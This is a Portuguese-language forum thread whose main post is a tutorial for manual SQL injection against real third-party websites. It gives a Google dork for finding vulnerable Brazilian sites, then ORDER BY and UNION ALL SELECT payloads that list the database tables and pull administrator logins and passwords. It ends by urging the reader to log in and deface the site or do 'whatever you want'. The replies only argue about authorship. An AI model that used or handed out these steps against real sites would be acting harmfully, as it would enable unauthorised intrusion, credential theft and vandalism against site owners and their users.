Explorando manualmente - SQL Injection

[Lf' 6]

SQL Injection Manualmente - Chega de Havij!

 

É um tutorial bem simples que eu mesmo fiz, já faz um tempo que não mexo com SQL Injection, mas ainda da pra ensinar quem não sabe xD

 

Obs: Vocês estão autorizados a postar esse tipo de conteúdo também, PORÉM, se revelarem senhas de sites e afins, serão punidos, pois isso é invasão de privacidade.

 

Neste tutorial básico vou mostrar como conseguir os dados administrativos de um site vulnerável a SQL injection

 

1° Vamos procurar um site vulneravel, para achar sites vulneráveis você pode usar strings como essa que "criei": inurl:.com.br mysql_result() detalhes +id=

com essa string só iram retornar sites com o erro, porém nem todos serão vulneráveis. mas uma boa parte será, você pode modificar a string para o jeito que achar melhor.

Por exemplo no lugar de detalhes você pode por: imoveis ou produtos.

( Use a string no google, lógico )

 

No meu caso consegui este site:

É necessário se cadastrar para acessar o conteúdo.

• Entre
• ou
• Cadastre-se

 

2° Vamos ver se o site está realmente vulnerável, para isso adicione aspas simples/apostrofo " ' " no final do link

 

É necessário se cadastrar para acessar o conteúdo.

• Entre
• ou
• Cadastre-se

'

 

se for vulnerável irá retornar um erro parecido com este:

 

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /home/siteturorial/public_html/detalhes.php on line 119

 

Isso quer dizer que o site esta vulnerável.

 

3° Agora vamos descobrir quantas colunas o site tem usando o comando order by esse e um comando que pode ser usado de dois modos, ou se usa seguindo uma sequencia de numeros e virgulas ate que o site retorne erro, ou você pode testar número por número sem as virgulas..

 

É necessário se cadastrar para acessar o conteúdo.

• Entre
• ou
• Cadastre-se

order by 1

É necessário se cadastrar para acessar o conteúdo.

• Entre
• ou
• Cadastre-se

order by 10

É necessário se cadastrar para acessar o conteúdo.

• Entre
• ou
• Cadastre-se

order by 15

É necessário se cadastrar para acessar o conteúdo.

• Entre
• ou
• Cadastre-se

order by 21

É necessário se cadastrar para acessar o conteúdo.

• Entre
• ou
• Cadastre-se

order by 22

 

Quando cheguei no número 22 o site exibiu um erro, então ele possui 21 colunas.

 

 

4° Apos saber quantas colunas tem o site, nos vamos usar o comado union all select para ter o conhecimento de qual das colunas nós podemos explorar, usaremos o comando dessa forma:

 

É necessário se cadastrar para acessar o conteúdo.

• Entre
• ou
• Cadastre-se

union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

 

observe que foi adicionado:" - " antes do 75, union all select, e o -- depois do 21. Feito isso pode aparecer 3 números ou mais o, numero que aparece em negrito são os números que vamos usr explorar no meu caso foi o 7,16 e 15.

 

5° Feito isso vamos listar as tabelas do site fazendo o seguinte:

 

É necessário se cadastrar para acessar o conteúdo.

• Entre
• ou
• Cadastre-se

union all select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.tables where table_schema=database()--

 

observe os comandos que foram adicionados: group_concat(table_name) e information_schema.tables where table_schema=database()

 

Feito isso aparece os nomes das tebelas no meu caso: acessos, administracao, bairros, cidades, corretores, emails, fotos, imoveis, tipoimoveis, tiponegocios. Nem todo site terá a tabela administracao, ela pode ter outro nome como: usuarios, usuario, users entre outros padrões.

 

6° Agora poderemos extrair as irformações que precisamos, pois ja sabemos de qual tabela teremos que tirá-las. depois disso é partir para o abraço! rs

 

É necessário se cadastrar para acessar o conteúdo.

• Entre
• ou
• Cadastre-se

union select 1,2,3,4,5,6,login,8,9,10,11,12,13,14,15,16,senha,18,19,20,21 from administracao

 

observe que no fim eu adicionei o from administracao que é a tabela que contem os dados.. e também adicionei o "login" poderia ser outra coisa como, user, username, no caso, neste site foi login. e também a adicionei a "senha" que também poderia ser outra coisa como password, psw entre outros padrões.

 

você deve ter percebido que adicionei "login" e "senha" no lugar de dois(2) dos tres(3) números que retornaram.

 

7° Página de login

 

Esta pode ser um parte simples ou complicada. ^^

alguns sites facilitam e deixam a área de login pra qualquer um, outros camuflam, você pode usar o havij para achar a página do admin.

depois que achala é só logar e fazer o deface ou o que você queira!

 

PRONTO! Conseguimos os dados da administração do site e Logamos!

enfim, é isso pessoal, esta é uma forma básica, simples, e rápida. Lembrando que existem outro modos e alguns macetes, mas isso fica para outro tópico rs, algumas vezes as senhas podem estar criptografadas, então você precisará descriptografar em algum site ou programas.

 

espero que tenham gostado! Breve postarei uma vídeo aula. Se perceberam algum erro me avisem para que eu corrija.

 

Créditos:

#DeathTheKid ( Lf' )

 

Não Copie esse tutorial sem minha autorização!

[ઽystem~* 0]

Obrigado Por compartilha estava com algumas Duvidas , Testado e Aproved rs ' ;*

[Lєader 0]

Já vi muito desse conteúdo em vários outros fóruns somente com o texto de uma forma diferente mas com a mesma intenção.

 

Creio que você deve ter se baseado em algum e reescrito o texto.

 

De qualquer forma está bom.

[Lf' 6]

Já vi muito desse conteúdo em vários outros fóruns somente com o texto de uma forma diferente mas com a mesma intenção.

 

Creio que você deve ter se baseado em algum e reescrito o texto.

 

De qualquer forma está bom.

 

Não sabia que era tão difícil fazer um tutorial de SQL Injection.. rs

Não reescrevi o texto, eu mesmo criei a um bom tempo atrás para um outro forum especializado nesses assuntos ( não é o GH rs ), se viu um texto exatamente igual, então andou vendo tutoriais meus.

Ou se viu apenas o mesmo método é porque é bem conhecido e ensinado ^^

Acho mais provável a segunda opção né ? kkk'

[Lєader 0]

Certo , quais fóruns então?

[Lf' 6]

Certamente que não vou fazer spam de forum aqui no tópico, lhe mando um MP com o nome..